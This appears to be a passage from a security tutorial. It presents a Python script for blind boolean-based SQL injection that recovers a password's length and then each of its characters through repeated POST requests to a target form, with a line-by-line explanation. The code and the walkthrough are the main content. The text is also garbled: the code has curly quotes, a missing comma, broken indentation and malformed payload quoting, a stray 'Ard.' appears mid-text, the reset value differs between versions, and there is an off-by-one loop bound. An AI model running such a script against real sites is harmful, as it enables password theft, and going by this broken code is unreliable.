The following script is how yours should look:

import requests
import sys

yes = sys.argv[1]

i = 1
asciivalue = 1

answer = []
print “Kicking off the attempt”

payload = {'injection': ''AND char_length(password) = '+str(i)+';#', 'Submit': 'submit'}

while True:
  req = requests.post('<target url>' data=payload)
  lengthtest = req.text
  if yes in lengthtest:
    length = i
    break
  else:
    i = i+1

for x in range(1, length):
  while asciivalue < 126:
payload = {'injection': ''AND (substr(password, '+str(x)+', 1)) = '+ chr(asciivalue)+';#', 'Submit': 'submit'}
      req = requests.post('<target url>', data=payload)
      if yes in req.text:
    answer.append(chr(asciivalue))
break
  else:
      asciivalue = asciivalue + 1
      pass
asciivalue = 0
print “Recovered String: “+ ''.join(answer)

Firstly, the user must identify a string that only occurs when the SQLi is successful. Alternatively, the script may be altered to respond to the absence of proof of a failed SQLi. We provide this string as a sys.argv variable. We also create the two iterators that we will use in this script and have set them to 1, as MySQL starts counting from 1 instead of 0 like the failed system it is. We also create an empty list for our future answer and instruct the user that the script is starting:

yes = sys.argv[1]

i = 1
asciivalue = 1
answer = []
print “Kicking off the attempt”

Our payload here basically requests the length of the password we are attempting to return and compares it to a value that will be iterated:

payload = {'injection': ''AND char_length(password) = '+str(i)+';#', 'Submit': 'submit'}

We then repeat the next loop forever as we have no idea how long the password is. We submit the payload to the target URL in a POST request:

while True:
  req = requests.post('<target url>' data=payload)

Each time we check to see if the yes value we set originally is present in the response text and, if so, we end the while loop setting the current value of i as the parameter length. The break command is the part that ends the while loop:

lengthtest = req.text
  if yes in lengthtest:
    length = i
    break

If we don't detect the yes value, we add 1 to i and continue the loop:

Ard.
else:
    i = i+1

Using the identified length of the target string, we iterate through each character and, using the asciivalue, each possible value of that character. For each value, we submit it to the target URL. Because the ascii table only runs up to 127, we cap the loop to run until the asciivalue has reached 126. If it reaches 127, something has gone wrong:

for x in range(1, length):
  while asciivalue < 126:
payload = {'injection': ''AND (substr(password, '+str(x)+', 1)) = '+ chr(asciivalue)+';#', 'Submit': 'submit'}
    req = requests.post('<target url>', data=payload)

We check to see if our yes string is present in the response and, if so, break to go onto the next character. We append our successful message to our answer string in character form, converting it with the chr command:

if yes in req.text:
    answer.append(chr(asciivalue))
break

If the yes value is not present, we add to asciivalue to move on to the next potential character for that position and pass:

else:
      asciivalue = asciivalue + 1
      pass

Finally, we reset asciivalue for each loop, and then when the loop hits the length of the string, we finish, printing the whole recovered string:

asciivalue = 1
print “Recovered String: “+ ''.join(answer)

Potentially, this script could be altered to handle iterating through tables and recovering multiple values through better crafted SQL Injection strings. Ultimately, this provides a base plate, as with the later Blind SQL Injection script, for developing more complicated and impressive scripts to handle challenging tasks. See the Exploiting Blind SQL Injection script for an advanced implementation of these concepts.